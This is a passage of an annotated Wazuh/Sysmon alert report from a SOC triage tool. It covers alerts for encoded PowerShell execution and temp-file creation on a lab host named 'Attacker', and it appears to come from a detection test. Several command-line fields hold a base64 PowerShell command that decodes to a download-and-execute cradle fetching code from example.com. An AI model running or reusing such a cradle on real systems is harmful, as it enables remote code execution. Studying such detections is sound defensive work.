data.win.eventdata.creationUtcTime:  2025-04-24 22:39:43.500
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:48.472+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:48.472+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  93
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534388.1892344
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:45.8395470Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285469
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:44.666 ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} ProcessId: 4736 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} ParentProcessId: 4284 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:44.666
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb0-680a-b00b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4736
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdac-680a-ad0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:48.488+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:48.488+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  97
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534388.1900407
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:46.0684203Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285470
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:46.062 ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} ProcessId: 4736 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_epfzzdna.g5t.ps1 CreationUtcTime: 2025-04-24 22:39:46.062 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:46.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb0-680a-b00b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4736
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_epfzzdna.g5t.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:46.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:51.124+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:51.124+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  94
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534391.1903172
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:48.4763635Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285495
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:47.286 ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} ProcessId: 10488 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} ParentProcessId: 4736 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:47.286
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb3-680a-b30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb0-680a-b00b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4736
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:51.143+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:51.143+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  98
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534391.1911239
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:48.7171585Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285496
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:48.710 ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} ProcessId: 10488 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pn3p00ne.adg.ps1 CreationUtcTime: 2025-04-24 22:39:48.710 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:48.710
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb3-680a-b30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pn3p00ne.adg.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:48.710
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
